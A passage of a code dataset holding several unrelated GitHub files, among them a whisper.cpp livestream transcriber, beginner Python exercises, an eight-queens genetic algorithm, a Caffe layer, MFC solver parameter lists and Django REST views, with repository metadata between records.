parser.add_argument('-u', '--url', type=str, default=URL, help='URL of the audio livestream')\n parser.add_argument('-s', '--step', type=int, default=None, help='step size in seconds, default 30s if not set not using openai. 25mb with openai')\n parser.add_argument('-m', '--model', type=str, default=MODEL, help='model to use for transcription')\n parser.add_argument('-p', '--whisper-path', type=str, default=WHISPER_PATH, help='path to whisper.cpp build')\n parser.add_argument('-v', '--verbose', action='store_true', help='print verbose output')\n parser.add_argument('-n', '--num-cpu', type=int, default=NUM_CPU, help='number of cpus to use')\n parser.add_argument('--use-openai-api', action='store_true', help='use OpenAI API instead of local whisper.cpp')\n parser.add_argument('-f', '--follow-stream', action='store_true', help='Continouslly follow web stream or local file (like tail -F)')\n parser.add_argument('--output-file', default=\"transcription.srt\", help='output file')\n return parser\n\ndef setup_logging(debug=False):\n logging.getLogger().setLevel(logging.DEBUG if debug else logging.INFO)\n handler = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('%(asctime)s [%(levelname)s] %(message)s')\n handler.setFormatter(formatter)\n logging.getLogger().addHandler(handler)\n\nasync def probe_codec_with_ffmpeg(url_or_file: str) -> str:\n codec = (await run_command_unsafe(\n \"ffprobe \"\n \"-loglevel error \"\n \" -select_streams a:0 \"\n \" -show_entries stream=codec_name \"\n \" -of default=noprint_wrappers=1:nokey=1 \"\n f\" {url_or_file}\"\n )).split(\"\\n\")[0].strip()\n logging.debug(\"codec: '%s'\", codec)\n return codec\n\nasync def live_transcribe(get_birth_time=default_get_birth_time):\n tmp_live_file = None\n background_process = None\n\n args = argparser().parse_args()\n setup_logging(args.verbose)\n logging.info(f\"Transcribing {args.url} using model '{args.model}', with {args.step} second steps (press Ctrl+C to stop):\\n\")\n input_compressed_file = None\n if os.path.exists(args.url):\n input_compressed_file = args.url\n else:\n input_codec = await probe_codec_with_ffmpeg(args.url)\n tmp_live_file = f\"/tmp/whisper-local-buffer.{input_codec}\"\n cmdls = gen_ffmpeg_copy_audio_cmd(args.url, tmp_live_file, read_input_at_native_frame_rate=True)\n background_process = await run_process_background(*cmdls)\n\n while not os.path.exists(tmp_live_file):\n logging.debug(\"Waiting for %s to be created...\", tmp_live_file)\n await asyncio.sleep(1)\n\n input_compressed_file = tmp_live_file\n try:\n params = {\n 'step_s': args.step,\n 'model': args.model,\n 'whisper_path': args.whisper_path,\n 'input_file': input_compressed_file,\n 'num_cpu': args.num_cpu,\n 'use_openai_api': args.use_openai_api,\n 'follow_stream': args.follow_stream,\n 'output_file': args.output_file,\n }\n async for chunk in transcribe(params, get_birth_time=get_birth_time):\n yield chunk\n finally:\n logging.debug(f\"finally: background_process: {background_process}, tmp_live_file: {tmp_live_file}\")\n if background_process:\n task, process = background_process\n if process.returncode is None:\n process.killed = True\n logging.debug(\"Killing background process %s\", process.pid)\n process.terminate()\n await task\n if tmp_live_file and os.path.exists(tmp_live_file):\n logging.debug(\"Removing %s\", tmp_live_file)\n os.remove(tmp_live_file)\n\nasync def main():\n async for chunk in live_transcribe():\n logging.info(chunk)\n\nif __name__ == \"__main__\":\n try:\n asyncio.run(main())\n except KeyboardInterrupt:\n print(\"Interrupted by user. Exiting...\")\n sys.exit(0)\n\n","repo_name":"tarasglek/whisper_multitool","sub_path":"whisper_multitool.py","file_name":"whisper_multitool.py","file_ext":"py","file_size_in_byte":18595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36790886026","text":"class AnyIter(object):\n\n def __init__(self, seq, safe=False):\n self.safe = safe\n self.iter = iter(seq)\n pass\n\n def __iter__(self):\n return self\n\n # 该方法用于循环\n def __next__(self, how_many=1):\n result = []\n for eachItem in range(how_many):\n try:\n result.append(self.iter.__next__())\n except StopIteration as e:\n if self.safe:\n return result\n else:\n raise e\n return result\n\n\nanyIter = AnyIter(range(5), True)\n# iter()方法等同于调用anyIter的__iter__方法\nmyIter = iter(anyIter)\nmyIter.__next__(88)\n","repo_name":"bestchenwu/PythonStudy","sub_path":"Unit13/AnyIter.py","file_name":"AnyIter.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69879933549","text":"prc = float(input('Digite o preço do produto: '))\nfm = input('Escolha a forma de pagamento:\\n'\n '1 - À vista no dinheiro/cheque\\n'\n '2 - À vista no cartão\\n'\n '3 - Até 2x no cartão\\n'\n '4 - 3x ou mais no cartão\\n'\n 'Selecione: ')\nprint('-'*40)\n\nif fm == '1':\n print('À VISTA DINHEIRO/CHEQUE: R${:.2f}'.format(prc - (prc / 10)))\nelif fm == '2':\n print('À VISTA CARTÃO: R${:.2f}'.format(prc - (prc / 20)))\nelif fm == '3':\n print('EM ATÉ 2X NO CARTÃO: R${:.2f}'.format(prc))\nelif fm == '4':\n vn = prc / 5\n print('EM 3X OU MAIS NO CARTÃO: R${:.2f}'.format((prc + vn)))\nelse:\n print('Opção inválida')\n","repo_name":"Thomaz-Castro/Programas-CursoEmVideo","sub_path":"Aulas Mundo 02/exercicios/aula 12/ex 044.py","file_name":"ex 044.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"519926869","text":"\"\"\"Perform screen settings\"\"\"\nfrom flet import Page\n\ndef configure_window(page: Page):\n \"\"\"\n Determines the default size, minimum screen size of the app\n\n * Args:\n \\t - page (Page): An instance of the page to make the changes\n \"\"\"\n height = 500\n width = 500\n\n page.title = \"Qr code Generator\"\n page.window_maximizable = False\n page.window_width = width\n page.window_height = height\n page.window_min_width = width\n page.window_min_height = height\n page.window_center()\n page.update()\n","repo_name":"rianwilliam/qrcode_generator","sub_path":"src/window_conf.py","file_name":"window_conf.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1213640049","text":"import random\n\nfrom queens_fitness import *\n\np_mutation = 0.2 # Low random probability for mutation\nnum_of_generations = 30 # Num of generations that will be created\nnum_of_queens = 8 # 8 queens\n\n\ndef genetic_algorithm(population, fitness_fn, minimal_fitness):\n '''Algorithm where the fittest are selected for reproductions in order to produce offspring for the next generation.\n It returns the fittest individual.'''\n \n # Loop that created each generation\n for generation in range(num_of_generations):\n # Print the num of current generation\n print(\"Generation {}:\".format(generation)) \n # Print all the chromosomes of the current generation along with their fitness score\n print_population(population, fitness_fn)\n\n # New population that is goind to be unioned with the current one, that is initially empty\n new_population = set()\n\n # Total fitness score is the sum of all the fitness scores\n fitness_scores_sum = 0\n for chromosome in population:\n # Since fitness score now is negative, we add 28(= 0 + 1 + 2 + 3 + 4 + 5 + 6 + 7) which\n # is when we get a negative fitness score that shows that all the 8 conficts happened.\n # With this, we won't ever have a negative fitness score.\n fitness_scores_sum = fitness_scores_sum + (fitness_fn(chromosome) + 28)\n\n # Fitness ration which is calculated by diving the fitness score of each chromosome-individual with /fitness_scores_sum.\n fitness_ratio = []\n for chromosome in population:\n fitness_ratio.append((fitness_fn(chromosome) + 28)/fitness_scores_sum) \n\n # For each chromosome\n for i in range(len(population)):\n # Select two pairs of individuals, the parents, based on their fitness score\n mother, father = random_selection(population, fitness_fn, fitness_ratio)\n\n # Reproduce two individuals with single-point crossover & Return the child individual\n child1, child2 = reproduce(mother, father)\n\n # Mutation to maintin adversity within the population and avoid premature convergence for the two children\n if random.uniform(0, 1) < p_mutation:\n child1 = mutate(child1)\n if random.uniform(0, 1) < p_mutation:\n child2 = mutate(child2)\n\n # Add each child (new chromosome) to the new population\n new_population.add(child1)\n new_population.add(child2)\n\n # Add new population to population, use union to disregard\n # duplicate individuals\n population = population.union(new_population)\n\n # The individual with the highest fitness score from the population\n fittest_individual = get_fittest_individual(population, fitness_fn)\n\n # If no production of signifficantly different offsprings is happening, then we have a solution\n if minimal_fitness <= fitness_fn(fittest_individual):\n break\n \n print(\"Final generation {}:\".format(generation))\n print_population(population, fitness_fn)\n\n return fittest_individual\n\n\ndef print_population(population, fitness_fn):\n '''Method that prints the population of a generation.'''\n for individual in population:\n fitness = fitness_fn(individual)\n print(\"{} - fitness: {}\".format(individual, fitness))\n\n\ndef reproduce(mother, father):\n '''\n Reproduce two individuals with single-point crossover.\n Return the two children individuals.\n '''\n offspring1, offspring2 = [],[]\n\n # Random point to be used for crossover.\n random_point = random.randint(0,num_of_queens-1)\n\n # Strarts from the left (=0) and goes to the right(=7)\n bit = 0\n\n # The first individual is copied up to the crossover point, then the second individual is copied from there on for the first offspring.\n # The second individual is copied up to the crossover point, then the first individual is copied from there on for the second offspring.\n while bit < random_point:\n offspring1.append(mother[bit])\n offspring2.append(father[bit])\n bit = bit + 1\n while bit <= num_of_queens-1:\n offspring1.append(father[bit])\n offspring2.append(mother[bit])\n bit = bit + 1\n \n #return children\n return [tuple(offspring1), tuple(offspring2)]\n\n\ndef mutate(individual):\n '''\n Mutate an individual by randomly assigning one of its bits.\n Return the mutated individual.\n '''\n mutated_offspring = []\n\n # Random bit to be mutated.\n random_queen = random.randint(0,num_of_queens-1)\n\n # Strarts from the left (=0) and goes to the right(=7)\n queen = 0\n\n # Goes through the offspring the mutates it ( flips the bit that is indicated by random_bit)\n while queen <= num_of_queens-1:\n if queen == random_queen:\n flag = 0\n while flag == 0:\n random_position = random.randint(0,num_of_queens-1)\n if individual[queen] != random_position:\n flag = 1\n mutated_offspring.append(random_position)\n else:\n mutated_offspring.append(individual[queen])\n \n queen = queen + 1\n \n #return mutation\n return tuple(mutated_offspring)\n\n\ndef random_selection(population, fitness_fn, fitness_ratio):\n \"\"\"\n Compute fitness of each in population according to fitness_fn and add up\n the total. Then choose 2 from sequence based on percentage contribution to\n total fitness of population\n Return selected variable which holds two individuals that were chosen as\n the mother and the father\n \"\"\"\n\n # Python sets are randomly ordered. Since we traverse the set twice, we\n # want to do it in the same order. So let's convert it temporarily to a\n # list.\n ordered_population = list(population) \n\n # Select randomly two parents - the parents must have different chrromosomes\n parents_found = 0\n while parents_found == 0:\n parents = random.choices(ordered_population,fitness_ratio,k=2)\n if parents[0] != parents[1]:\n parents_found = 1\n\n #return selected\n selected = [parents[0], parents[1]]\n return selected \n\ndef fitness_function(individual):\n '''\n Computes the decimal value of the individual\n Return the fitness level of the individual\n\n Explanation:\n enumerate(list) returns a list of pairs (position, element):\n\n enumerate((4, 6, 2, 8)) -> [(0, 4), (1, 6), (2, 2), (3, 8)]\n\n enumerate(reversed((1, 1, 0))) -> [(0, 0), (1, 1), (2, 1)]\n '''\n\n #return fitness\n return (2**2) * individual[0] + (2**1) * individual[1] + (2**0) * individual[2]\n\n\ndef get_fittest_individual(iterable, func):\n return max(iterable, key=func)\n\n\ndef get_initial_population(n, count):\n '''\n Randomly generate count individuals of length n\n Note since its a set it disregards duplicate elements.\n '''\n return set([\n tuple(random.randint(1, 8) for _ in range(n))\n for _ in range(count)\n ])\n\n\ndef main():\n\n minimal_fitness = 0 # It's the minimum number of conflicting pairs, which indicates that no conficts have taken place\n\n # Population randomly created, an not set has been given.\n initial_population = get_initial_population(8, 8)\n print('Initial population:\\n',initial_population)\n\n # Calling GA algorithm and calculating fitness score with method fitness_fn_positive from queens_fitness.py\n fittest = genetic_algorithm(initial_population, fitness_fn_positive, minimal_fitness)\n print('Fittest Individual: ' + str(fittest))\n\n\nif __name__ == '__main__':\n pass\n main()","repo_name":"apatti01/Artificial-Intelligence","sub_path":"Lab 4/Homework/Homework.py","file_name":"Homework.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27554171154","text":"import pdb\nfrom gymmanager import GymManager\nfrom customer import Customer \nfrom package import Package \n\n\ngymManager = GymManager()\n\nprint(\"\\n\")\nprint(\"******Amazing Gym Management System******\")\nprint(\"Hello Admin, Please select a \")\n\ndef menu():\n print(\"1. Add Customer\")\n print(\"2. Add Package\")\n print(\"3. Show all packages\")\n print(\"4. Show all customers\")\n print(\"5. Find customer by name\")\n print(\"6. Add Subscription\")\n print(\"7. Add Payment\")\n print(\"8. Show this menu again\")\n print()\n \n\nmenu()\nwhile True:\n try:\n selection = int(input(\"Enter Choice: \"))\n if selection == 1:\n name = str(input(\"Enter customer name: \"))\n phone_no = str(input(\"Enter customer phone no: \"))\n joined_date = str(input(\"Enter joined date:\"))\n customer = Customer(name, phone_no, joined_date)\n gymManager.add_customer(customer)\n elif selection == 2:\n name = input(\"Enter Package Name- \")\n facilities = input(\"Enter Facilities- \")\n cost = input(\"Enter cost- \")\n package = Package(name,facilities,cost)\n gymManager.add_package(package)\n\n elif selection == 3:\n for pkgId in gymManager.packages.keys():\n package = gymManager.packages[pkgId]\n packageId = pkgId\n package_names = package.get_package_name\n facilities = package.get_facilities\n cost = package.get_cost\n print(str(packageId) + \"\\t\" + package_names + \"\\t\" \\\n + facilities + \"\\t\" + '$'+ str(cost) )\n\n elif selection == 4:\n for cId in gymManager.customers.keys():\n customer = gymManager.customers[cId]\n customer_id = cId\n print(customer_id)\n customer_names = customer.get_name\n print(str(customer_id) + '\\t' + customer_names) \n \n\n\n\n except ValueError as e:\n print(\"Wrong Entry. Enter a number\")","repo_name":"eustone/gymsystem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5576596940","text":"import caffe\nimport numpy as np\n\nclass NormLayer(caffe.Layer):\n def setup(self, bottom, top):\n if len(bottom) != 1:\n raise Exception(\"Input size error.\")\n \n params = eval(self.param_str)\n self.src_type = params['src_type']\n self.dst_type = params['dst_type']\n \n def reshape(self, bottom, top):\n self.src = np.cast['float32'](bottom[0].data)\n top[0].reshape(*self.src.shape)\n\n def forward(self, bottom, top):\n if self.src_type == 'uess': # [0, 255]\n if self.dst_type == 'udec': # [0, 1]\n dst = self.src / 255.0\n elif self.dst_type == 'dec': # [-1, 1]\n dst = ((self.src / 255.0) * 2.0) - 1.0\n else:\n raise Exception(\"Input type error1.\")\n elif self.src_type == 'udec': # [0, 1]\n if self.dst_type == 'uess': # [0, 255]\n dst = self.src * 255.0\n elif self.dst_type == 'dec': # [-1, 1]\n dst = (self.src * 2.0) - 1.0\n else:\n raise Exception(\"Input type error2.\")\n elif self.src_type == 'dec': # [-1, 1]\n if self.dst_type == 'uess': # [0, 255]\n dst = ((self.src / 2.0) + 0.5) * 255.0\n elif self.dst_type == 'udec': # [0, 1]\n dst = (self.src / 2.0) + 0.5\n else:\n raise Exception(\"Input type error3.\")\n else:\n raise Exception(\"Input type error0.\")\n\n top[0].data[...] = dst\n\n def backward(self, bottom, top):\n pass","repo_name":"JunhyeongBak/Caffe_Light_Field","sub_path":"layers/norm_layer.py","file_name":"norm_layer.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24769523506","text":"import numpy as np\nsize = int(input(\"Enter the size of array::\"))\narr = np.array([input(\"Enter elements::\") for _ in range(size)])\nnp.set_printoptions(threshold=np.inf)\n# result = arr.tolist()\nresult1 = '['+ ', '.join(arr)+']'\nprint(result1)\n\ndef partition(array):\n i,j= 1,len(array) -1\n x=array[0]\n while i<=j:\n if array[i]<=x:\n i+=1\n elif array[j]>x:\n j-=1\n else:\n array[i],array[j]= array[j],array[i]\n i+=1\n j-=1\n else:\n array[0],array[j]= array[j],array[0]\n return array \n# x = int(input(\"Enter x::\"))\n# if str(x) in result:\n# partition(arr, x)\n# else:\n# print(\"Number not in array\"dwdwdw)\n# arr = [6,9,4,5,1,7,3,10]\n# array2 = ', '.join(arr)\narray2 =partition(arr)\nresult2 = '['+ ', '.join(array2)+']'\nprint(result2)\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20928983677","text":"from ..util import common\n\n\nPRE_PROCESS = ['case_dir', 'old_grid', 'old_ic', 't_step_old', 'm', 'n', 'p',\n 'cyl_coord', 'model_eqns', 'num_fluids', 'adv_alphan', 'mpp_lim',\n 'weno_order', 'precision', 'parallel_io', 'perturb_flow',\n 'perturb_flow_fluid', 'perturb_sph', 'perturb_sph_fluid',\n 'fluid_rho', 'hypoelasticity', 'num_patches', 'Ca', 'Web',\n 'Re_inv', 'pref', 'rhoref', 'bubbles' , 'polytropic',\n 'polydisperse', 'poly_sigma', 'thermal', 'nb', 'R0ref', 'qbmm',\n 'dist_type', 'R0_type', 'sigR', 'sigV', 'rhoRV']\n\nfor cmp in [\"x\", \"y\", \"z\"]:\n for prepend in [\"domain%beg\", \"domain%end\", \"a\", \"b\"]:\n PRE_PROCESS.append(f\"{cmp}_{prepend}\")\n\n for append in [\"stretch\", \"a\", \"loops\"]:\n PRE_PROCESS.append(f\"{append}_{cmp}\")\n\n PRE_PROCESS.append(f\"bc_{cmp}%beg\")\n PRE_PROCESS.append(f\"bc_{cmp}%end\")\n\nfor f_id in range(1, 10+1):\n PRE_PROCESS.append(f'fluid_rho({f_id})')\n\n for attribute in [\"gamma\", \"pi_inf\", \"mul0\", \"ss\", \"pv\", \"gamma_v\", \"M_v\",\n \"mu_v\", \"k_v\", \"G\"]:\n PRE_PROCESS.append(f\"fluid_pp({f_id})%{attribute}\")\n\nfor p_id in range(1, 10+1):\n for attribute in [\"geometry\", \"radius\", \"radii\", \"epsilon\", \"beta\",\n \"normal\", \"smoothen\", \"smooth_patch_id\", \"alpha_rho\",\n \"smooth_coeff\", \"rho\", \"vel\", \"pres\", \"alpha\", \"gamma\",\n \"pi_inf\", \"r0\", \"v0\", \"p0\", \"m0\"]:\n PRE_PROCESS.append(f\"patch_icpp({p_id})%{attribute}\")\n\n for cmp_id, cmp in enumerate([\"x\", \"y\", \"z\"]):\n cmp_id += 1\n PRE_PROCESS.append(f'patch_icpp({p_id})%{cmp}_centroid')\n PRE_PROCESS.append(f'patch_icpp({p_id})%length_{cmp}')\n\n for append in [\"radii\", \"normal\", \"vel\"]:\n PRE_PROCESS.append(f'patch_icpp({p_id})%{append}({cmp_id})')\n\n for arho_id in range(1, 10+1):\n PRE_PROCESS.append(f'patch_icpp({p_id})%alpha({arho_id})')\n PRE_PROCESS.append(f'patch_icpp({p_id})%alpha_rho({arho_id})')\n\n for taue_id in range(1, 6+1):\n PRE_PROCESS.append(f'patch_icpp({p_id})%tau_e({taue_id})')\n\n if p_id >= 2:\n PRE_PROCESS.append(f'patch_icpp({p_id})%alter_patch')\n\n for alter_id in range(1, p_id):\n PRE_PROCESS.append(f'patch_icpp({p_id})%alter_patch({alter_id})')\n\n\nSIMULATION = ['case_dir', 'run_time_info', 't_step_old', 't_tol', 'debug', 'm',\n 'n', 'p', 'cyl_coord', 'dt', 't_step_start', 't_step_stop',\n 't_step_save', 'model_eqns', 'num_fluids', 'adv_alphan',\n 'mpp_lim', 'time_stepper', 'weno_vars', 'weno_order', 'weno_eps',\n 'char_decomp', 'mapped_weno', 'mp_weno', 'weno_avg',\n 'weno_Re_flux', 'riemann_solver', 'wave_speeds', 'avg_state',\n 'commute_err', 'split_err', 'alt_crv', 'alt_soundspeed',\n 'regularization', 'reg_eps', 'null_weights', 'mixture_err',\n 'tvd_riemann_flux', 'tvd_rhs_flux', 'tvd_wave_speeds', 'flux_lim',\n 'We_riemann_flux', 'We_rhs_flux', 'We_src', 'We_wave_speeds',\n 'lsq_deriv', 'parallel_io', 'precision', 'hypoelasticity',\n 'fd_order' , 'com_wrt', 'num_probes', 'probe_wrt', 'cb_wrt',\n 'threshold_mf', 'moment_order', 'pref', 'rhoref', 'polydisperse',\n 'poly_sigma', 'bubbles', 'bubble_model', 'polytropic', 'thermal',\n 'R0ref', 'Ca', 'Web', 'Re_inv', 'nb', 'Monopole', 'num_mono',\n 'qbmm', 'R0_type', 'integral_wrt', 'num_integrals',\n \"cu_mpi\"]\n\nfor cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f'bc_{cmp}%beg')\n SIMULATION.append(f'bc_{cmp}%end')\n\nfor wrt_id in range(1,10+1):\n SIMULATION.append(f'com_wrt({wrt_id})')\n SIMULATION.append(f'cb_wrt({wrt_id})')\n\n for cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f'probe_wrt({wrt_id})%{cmp}')\n\nfor probe_id in range(1,3+1):\n for cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f'probe({probe_id})%{cmp}')\n\nfor mf_id in range(1,5+1):\n SIMULATION.append(f'threshold_mf({mf_id})')\n\nfor order_id in range(1,5+1):\n SIMULATION.append(f'moment_order({order_id})')\n\nfor f_id in range(1,10+1):\n for attribute in [\"gamma\", \"pi_inf\", \"mul0\", \"ss\", \"pv\", \"gamma_v\", \"M_v\",\n \"mu_v\", \"k_v\", \"G\"]:\n SIMULATION.append(f\"fluid_pp({f_id})%{attribute}\")\n\n for re_id in [1, 2]:\n SIMULATION.append(f\"fluid_pp({f_id})%Re({re_id})\")\n\n for mono_id in range(1,4+1):\n for attribute in [\"mag\", \"length\", \"dir\", \"npulse\", \"pulse\", \"support\",\n \"delay\"]:\n SIMULATION.append(f\"Mono({mono_id})%{attribute}\")\n\n for cmp_id in range(1,3+1):\n SIMULATION.append(f\"Mono({mono_id})%loc({cmp_id})\")\n\n for int_id in range(1,5+1):\n for cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f\"integral({int_id})%{cmp}min\")\n SIMULATION.append(f\"integral({int_id})%{cmp}max\")\n\n\nPOST_PROCESS = ['case_dir', 'cyl_coord', 'm', 'n', 'p', 't_step_start',\n 't_step_stop', 't_step_save', 'model_eqns', 'num_fluids',\n 'adv_alphan', 'mpp_lim', 'weno_order', 'alt_soundspeed',\n 'mixture_err', 'parallel_io', 'hypoelasticity',\n 'polydisperse', 'poly_sigma', 'polytropic', 'thermal',\n 'pref', 'Ca', 'Web', 'Re_inv', 'rhoref', 'bubbles',\n 'R0ref', 'nb', 'format', 'precision', 'coarsen_silo',\n 'fourier_decomp', 'fourier_modes%beg',\n 'fourier_modes%end', 'alpha_rho_wrt', 'rho_wrt',\n 'mom_wrt', 'vel_wrt', 'flux_lim', 'flux_wrt', 'E_wrt',\n 'pres_wrt', 'alpha_wrt', 'kappa_wrt', 'gamma_wrt',\n 'heat_ratio_wrt', 'pi_inf_wrt', 'pres_inf_wrt',\n 'cons_vars_wrt', 'prim_vars_wrt', 'c_wrt', 'omega_wrt',\n 'schlieren_wrt', 'schlieren_alpha', 'fd_order']\n\nfor cmp_id in range(1,3+1):\n cmp = [\"x\", \"y\", \"z\"][cmp_id-1]\n\n POST_PROCESS.append(f'bc_{cmp}%beg')\n POST_PROCESS.append(f'bc_{cmp}%end')\n\n for attribute in [\"mom_wrt\", \"vel_wrt\", \"flux_wrt\", \"omega_wrt\"]:\n POST_PROCESS.append(f'{attribute}({cmp_id})')\n\nfor fl_id in range(1,10+1):\n for append in [\"schlieren_alpha\", \"alpha_rho_wrt\", \"alpha_wrt\", \"kappa_wrt\"]:\n POST_PROCESS.append(f'{append}({fl_id})')\n\n for attribute in [\"gamma\", \"pi_inf\", \"ss\", \"pv\", \"gamma_v\", \"M_v\", \"mu_v\", \"k_v\", \"G\", \"mul0\"]:\n POST_PROCESS.append(f\"fluid_pp({fl_id})%{attribute}\")\n\n\nCASE_OPTIMIZATION = [ \"nb\", \"weno_order\" ]\n\n\ndef get_input_dict_keys(target_name: str, args: list) -> list:\n result = None\n if target_name == \"pre_process\": result = PRE_PROCESS.copy()\n if target_name == \"simulation\": result = SIMULATION.copy()\n if target_name == \"post_process\": result = POST_PROCESS.copy()\n\n if result == None:\n raise common.MFCException(f\"[INPUT DICTS] Target {target_name} doesn't have an input dict.\")\n\n if not args[\"case_optimization\"] or target_name != \"simulation\":\n return result\n \n return [ x for x in result if x not in CASE_OPTIMIZATION ]\n","repo_name":"MFlowCode/MFC-develop","sub_path":"toolchain/mfc/run/case_dicts.py","file_name":"case_dicts.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19299812166","text":"from core.models import *\nfrom core.api.serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import viewsets, status\n\nfrom rest_framework.authentication import TokenAuthentication\n\n\n@api_view(['GET', 'POST'])\ndef state_api_view(request):\n if request.method == 'GET':\n state = State.objects.all()\n stateSerializers = StateSerializers(state, many=True)\n return Response(stateSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n stateSerializers = StateSerializers(data = request.data)\n if stateSerializers.is_valid():\n stateSerializers.save()\n return Response(stateSerializers.data, status.HTTP_201_CREATED)\n return Response(stateSerializers.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\n\ndef case_api_view(request):\n if request.method == 'GET':\n case = Case.objects.all()\n caseSerializers = CaseSerializers(case, many=True)\n return Response(caseSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n caseSerializers = CaseSerializers(data = request.data)\n if caseSerializers.is_valid():\n caseSerializers.save()\n return Response(caseSerializers.data, status.HTTP_201_CREATED)\n return Response(caseSerializers.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\ndef portafolio_api_view(request):\n if request.method == 'GET':\n portafolio = MediationPortafolio.objects.all()\n portafolioSerializers = PortafolioSerializers(portafolio, many=True)\n return Response(portafolioSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n portafolio = PortafolioSerializers(data = request.data)\n if portafolio.is_valid():\n portafolio.save()\n return Response(portafolio.data, status.HTTP_201_CREATED)\n return Response(portafolio.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\ndef sessions_api_view(request):\n if request.method == 'GET':\n sessions = MediationSessions.objects.all()\n sessionsSerializers = SessionsSerializers(sessions, many=True)\n return Response(sessionsSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n sessions = SessionsSerializers(data = request.data)\n if sessions.is_valid():\n sessions.save()\n return Response(sessions.data, status.HTTP_201_CREATED)\n return Response(sessions.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef state_detail_api_view(request, pk=None):\n state = State.objects.filter(id = pk).first()\n if state:\n if request.method == 'GET':\n stateSerializers = StateSerializers(state)\n return Response(stateSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n stateSerializers = StateSerializers(state, data = request.data)\n if stateSerializers.is_valid():\n stateSerializers.save()\n return Response(stateSerializers.data)\n return Response(stateSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n state.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado un estado con estos datos'}, status = status.HTTP_400_BAD_REQUEST)\n@api_view(['GET', 'PUT', 'DELETE'])\ndef case_detail_api_view(request, pk=None):\n case = Case.objects.filter(id = pk).first()\n if case:\n if request.method == 'GET':\n caseSerializers = CaseSerializers(case)\n return Response(caseSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n caseSerializers = CaseSerializers(case, data = request.data)\n if caseSerializers.is_valid():\n caseSerializers.save()\n return Response(caseSerializers.data)\n return Response(caseSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n case.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado un caso con estos datos'})\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef portfolio_detail_api_view(request, pk=None):\n portafolio = MediationPortafolio.objects.filter(id = pk).first()\n if portafolio:\n if request.method == 'GET':\n portafolioSerializers = PortafolioSerializers(portafolio)\n return Response(portafolioSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n portafolioSerializers = PortafolioSerializers(portafolio, data = request.data)\n if portafolioSerializers.is_valid():\n portafolioSerializers.save()\n return Response(portafolioSerializers.data)\n return Response(portafolioSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n portafolio.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado un portfolio con estos datos'}, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef session_detail_api_view(request, pk=None):\n session = MediationSessions.objects.filter(id = pk).first()\n if session:\n if request.method == 'GET':\n sessionSerializers = SessionsSerializers(session)\n return Response(sessionSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n sessionSerializers = SessionsSerializers(session, data = request.data)\n if sessionSerializers.is_valid():\n sessionSerializers.save()\n return Response(sessionSerializers.data)\n return Response(sessionSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n session.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado una Session con estos datos'})\n","repo_name":"FranAmeri99/Centro_Mediacion_API","sub_path":"app/core/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40131212424","text":"from django.shortcuts import render\nfrom allauth.account.admin import EmailAddress\nfrom .models import Commodity\nfrom django.core.paginator import Paginator\n\n\ndef index(request):\n if request.method == \"GET\":\n current_user, verified = get_member_data(request)\n return render(request, 'index.html', locals())\n\n\ndef listing(request):\n if request.method == \"GET\":\n current_user, verified = get_member_data(request)\n products = Commodity.objects.all()\n paginator = Paginator(products, 9)\n page_number = request.GET.get('page')\n page_obj = 